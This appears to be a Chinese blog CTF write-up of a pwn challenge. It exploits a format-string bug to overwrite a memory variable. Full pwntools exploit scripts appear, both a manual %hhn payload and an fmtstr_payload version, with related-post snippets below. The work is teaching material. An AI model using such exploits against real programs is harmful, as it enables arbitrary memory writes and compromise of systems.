记一次赛题--pwn--没有溢出啦【格式化字符串】

已于 2022-12-15 22:21:24 修改
阅读量217 收藏 1
点赞数 1
分类专栏: pwn刷题笔记 文章标签: python c语言
于 2022-12-12 13:02:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_73149934/article/details/128285127
版权

检查

ida

 

格式化字符串漏洞,覆盖大数字

准备

exp

方法一、手动计算

#exp0,获得偏移

from pwn import*
context.log_level="debug"
i=process("/home/error/桌面/no")

p1=b"aaaa %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p"
i.sendline(p1)
i.interactive()








#exp,由上得到偏移为7,目标值为0x5201314

'''
┌──(root㉿kali)-[~]
└─# python3     
Python 3.10.8 (main, Nov  4 2022, 09:21:25) [GCC 12.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> 0x114-16
260
>>> 0x213-0x114
255
>>> 0x220-0x213
13
>>> 0x305-0x220
229
>>> 
'''

from pwn import*
context.log_level="debug"
i=process("/home/error/桌面/no")
#i=remote("101.43.222.218",9284)

i.recvline()
key_addr=0x0804A030
p1=flat([key_addr,key_addr+1,key_addr+2,key_addr+3])
p1+=b"%260x"+b"%7$hhn"+b"%255x"+b"%8$hhn"+b"%13x"+b"%9$hhn"+b"%229x"+b"%10$hhn"

i.sendline(p1)
i.interactive()

 方法二、借助工具

#exp,由上得到偏移为7,目标值为0x5201314

from pwn import*
context.log_level="debug"
i=process("/home/error/桌面/no")
#i=remote("101.43.222.218",9284)
key_addr=0x0804a030
p1=fmtstr_payload(7,{key_addr:0x5201314})
i.sendline(p1)
i.interactive()

结果

思考

fmtstr_payload是pwntools里面的一个工具,用来简化对格式化字符串漏洞的构造工作。

可以实现修改任意内存,仅支持32位
p=fmtstr_payload(偏移, {变量地址:目的值})

X1NRI
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2018 10 13 pwn的学习0x4 没有缓冲区溢出和护网杯的pwn签到题目
startr4ck
10-13 429
今天所遇到的题目都是判断变量放在内存当中 我们可以使用覆盖来对判断变量进行改变  当覆盖到变量之后 就可以实现我们想要的跳转 我们要覆盖v5的数值为11.28125 ,点看读进去的buf的地址 和v5的地址   发现相差 是0x20的大小所以直接发送'a'*20+(11.28215za在内存当中的数值)但是如何得到这个数在内存当中的数值呢 我们在汇编代码当中看 进去之后看到了数值...
gef-extras:GEF的额外优惠
03-31
在"pwn"(Payload Writing and Exploitation)领域,gef-extras提供了针对缓冲区溢出、格式字符串漏洞等常见攻击场景的专用工具。这些工具可以帮助研究人员快速定位和利用安全漏洞,构建有效的payload。 **gef-...
leetcode第 185 场周赛——A.重新格式化字符串 题解
BNDSllx的博客
04-19 119
题目链接:https://leetcode-cn.com/problems/reformat-the-string/ 要求字母、数字轮流出现,维护两个vector存储每个字母和数字,并用cnt1和cnt2录字母和数字出现的次数,如果某一种字符比另一种出现的次数多2及以上,就无法满足,直接return空字符串。 分情况讨论,依次从两个vector中pop出字符放到结果字符串中 代码如下: cl...
2018 10 14 pwn的学习0x5 没有缓冲区溢出,但是函数参数可覆盖
startr4ck
10-14 296
同样是一道pwn的入门题目,题目本身不同于覆盖返回地址进行控制程序流,而是通过控制紧紧挨着缓冲区附近的参数进行修改从而达到我们所想要程序的目的。 在这里发现我们使用的fgets进行输入,我们利用gdb进去看看 , 在这里发现箭头所指的位置是指的我们的下面的输出函数的内容所以我们要把这个内容所替换, 在程序当中发现有这么一段 把返回地址覆盖为他的地址就可以了   使用scanf函...
[第五空间2019 决赛]PWN5 | BUUCTF | 格式化字符串 | 计算偏移量
Dem1的博客
04-09 805
正经wp from pwn import* p=remote("node4.buuoj.cn",29506) bssaddr = 0x804c044 #binaddr = 0x0804932F #1 #payload = 'aaaa-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x' ## aaaa-ffb14fe8-63-0-ffb1500e-3-c2-f7e9791b-ffb1500e-ffb1510c-61616161-2d78252d-252d78
pwn 学习笔 格式化串计算偏移量
SsMing的博客
08-15 4873
学习参照:https://ctf-wiki.github.io/ctf-wiki/pwn/fmtstr/fmtstr_exploit/ 利用%s泄露libc函数的got表内容 addr%k$s可以用来泄露指定地址的内容,但要先确定k的值,可控制的格式化字符串参数是函数第几个参数(k+1),减一就是格式化字符串的第几个参数(k)。 利用  [tag]%p%p%p%p%p%p%p%p%p%p来确...
ciscn-2019-pwn
11-29
- **baby_pwn** 文件可能是最简单的,设计用来教授基本的堆栈溢出或格式字符串攻击等基础知识。 总的来说,"ciscn-2019-pwn"挑战涉及了网络安全中的漏洞利用技术,参赛者需要具备逆向工程、内存安全理解、编程和...
PWN-Challenges
03-17
3. **格式字符串漏洞**:利用printf或scanf等函数的格式化字符串特性,通过特殊格式字符读取或修改内存。 4. **栈保护机制**:理解并绕过如Canary、NX Bit(非执行栈)和ASLR(地址空间布局随机化)等安全防护机制...
2021-信息安全与数据恢复方向竞赛-实践操作竞赛样题-第1天任务(1)0001.docx
12-15
2 babyfmtpwn pwn 可以利用格式化字符串漏洞与栈溢出漏洞覆盖返回地址 50 Nc IP 端口号 3 babySPNcrypt crypt 考察对称密码中的SPN架构的认识 45 附件内 4 multiRSAcrypt crypt 主要考察凯撒加密和RSA中公钥有公因子...
pwn溢出10道练习题有writeup
01-04
4. **格式字符串漏洞**:特定函数如`printf`和`scanf`允许使用格式化字符串,如果用户输入不受限制,可以导致栈溢出。学习如何识别和利用这些漏洞是pwn题目的常见部分。 5. **堆溢出**:虽然题目主要关注栈溢出,但...
CTF PWN 格式化字符串
VisualNull的博客
06-05 1203
CTF PWN格式化字符串
[pwn]格式化字符串全自动exp!!!
mid2dog
05-14 2163
前言 格式化字符串一把梭真的好爽!!!!!! 再也不用绞尽脑汁去gdb调试多少个字节和几位了!! 呜呜呜,花了一个通宵把这一系列搞定,喜极而泣,特此录 以前的我做这类题心理状态: 现在的我: 总之就是非!常!爽! 这里我用的例题是 [第五空间2019决赛] 里的pwn5,考察到的知识是单纯的格式化字符串格式化字符串原理及利用 原理就不赘述啦,详情参考ctfwiki上的内容 或者搜索下,其他很多大佬写的文章都超级棒!! 利用的话,如下: 利用格式化字符串的漏洞,一般会有如下几种操作: 泄露栈内存
pwn刷题num16----寻找地址间距,栈溢出覆盖返回地址
tbsqigongzi的博客
04-23 800
攻防世界pwn进阶区stack2 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位,小端序 开启部分RELRO---got表仍可写 开启canary保护---栈溢出需绕过canary 开启NX保护----堆栈不可执行 未开启PIE----程序地址为真实地址 动态链接 运行程序,先输入数字总量,之后输入数字,会有一个菜单栏,分别实现对数字展示,添加,改变,取平均值,和退出程序五种功能。 ida看一下主函数 观察主函数,发现一处溢出数组越界漏洞,v5没有限制大小,使得
buuctf-pwn 5-8
m0_74355719的博客
10-04 83
查看栈结构发现v2的长度为0x3c,即60个字节,而输入被限制在32个字节内,每个I可以被替换成you,所以输入60÷3=20个I就能让栈溢出,然后db 4 dup(?发现明显的格式化漏洞,因为这个dword_804c044从服务器读入,无法知道其内容,所以使用%n将其数据修改,随后passwd输入相同的数据即可得到shell。思路:利用字符串漏洞将判断的atoi直接替换成system,然后手动输入"/bin/sh"字符串,即可达成system(“/bin/sh”)目的。
buuoj —— [第五空间2019 决赛]PWN5
qq_41027231的博客
05-30 167
格式化字符串: https://www.cnblogs.com/0xJDchen/p/5904816.html %d:读取10进制数值 %x:读取16进制数值 %s:读取字符串值 %n:将当前字符串的长度打印到var中。如 printf(“test %hn”,&var[其中var为两个字节]) printf(“test %n”,&var[其中var为一个字节]) 1)得到字符串离esp的距离 输入多个%08x; %12x可以直接读取偏移12处的值,省略输入前11个2)对任意地址进行任意写写任
PWN学习总结
windy_ll的博客
12-26 1848
一、栈溢出原理     什么是栈溢出?栈溢出就是缓冲区溢出的一种。 由于缓冲区溢出而使得有用的存储单元被改写,往往会引发不可预料的后果。程序在运行过程中,为了临时存取数据的需要,一般都要分配一些内存空间,通常称这些空间为缓冲区。如果向缓冲区中写入超过其本身长度的数据,以致于缓冲区无法容纳,就会造成缓冲区以外的存储单元被改写,这种现象就称为缓冲区溢出。缓冲区长度一般与用户自己定义的缓冲变量的类型有关。(PS:摘自百度百科)     简单来说,就是程序没有检查用户输入的数据长度,导致攻击者覆盖栈上不是程序希望写
PWN——格式化字符串泄露canary
djhtdjdywgjc的博客
11-19 1253
格式化字符串泄露canary
数据结构-栈(C语言代码)
weixin_50246370的博客
08-12 5465
栈(stack)又名堆栈,它是一种运算受限的线性表。限定仅在表尾进行插入和删除操作的线性表。这一端被称为栈顶,相对地,把另一端称为栈底。向一个栈插入新元素又称作进栈、入栈或压栈,它是把新元素放到栈顶元素的上面,使之成为新的栈顶元素;从一个栈删除元素又称作出栈或退栈,它是把栈顶元素删除掉,使其相邻的元素成为新的栈顶元素。 #include <stdio.h> #include <stdlib.h> typedef struct Node { int data; struct.
pwn中堆溢出的几种模式及相应的利用方法小结
snowleopard_bin的博客
08-01 2672
一、fastbin(16Bytes&lt;= size&lt;=64Bytes )    1、覆盖fd , 向任意地址写任意内容(write-anything-anywhere) buf1 = malloc(32)#1 buf2 = malloc(32)#2 free(2) free(1)#first one to be allocated buf1 ...
ctfd-pwn赛题收集
最新发布
10-23
ctfd-pwn是一个非常受欢迎的CTF(Capture The Flag)比赛中的一个赛题类型,它主要涉及二进制漏洞的利用和系统安全的挑战。 在ctfd-pwn赛题的收集过程中,通常需要考虑以下几个方面: 1. 题目类型:ctfd-pwn赛题可以包含多种类型的漏洞,例如缓冲区溢出格式化字符串漏洞、整数溢出等。在收集赛题时需要确保涵盖各种漏洞类型,增加题目的多样性和挑战性。 2. 难度级别:赛题的难度级别应该根据参赛者的水平来确定。可以设置多个难度级别的赛题,包括初级、中级和高级,以便参赛者可以逐步提高自己的技能。 3. 原创性:收集ctfd-pwn赛题时应尽量保持赛题的原创性,避免过多的抄袭或重复的赛题。这有助于增加参赛者的学习价值,同时也能提高比赛的公平性。 4. 实用性:收集的赛题应该具有实际应用的意义,能够模拟真实的漏洞和攻击场景。这样可以帮助参赛者更好地理解和掌握系统安全的基本原理。 5. 文档和解答:为每个收集的赛题准备详细的文档和解答是很有必要的。这些文档包括赛题的描述、利用漏洞的步骤和参考资源等,可以帮助参赛者更好地理解赛题和解题思路。 6. 持续更新:CTF比赛的赛题应该定期进行更新和维护,以适应不断变化的网络安全环境。同时也要根据参赛者的反馈和需求,不断收集新的赛题,提供更好的比赛体验。 综上所述,ctfd-pwn赛题的收集需要考虑赛题类型、难度级别、原创性、实用性、文档和解答的准备,以及持续更新的需求。这样才能提供一个富有挑战性和教育性的CTF比赛平台。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值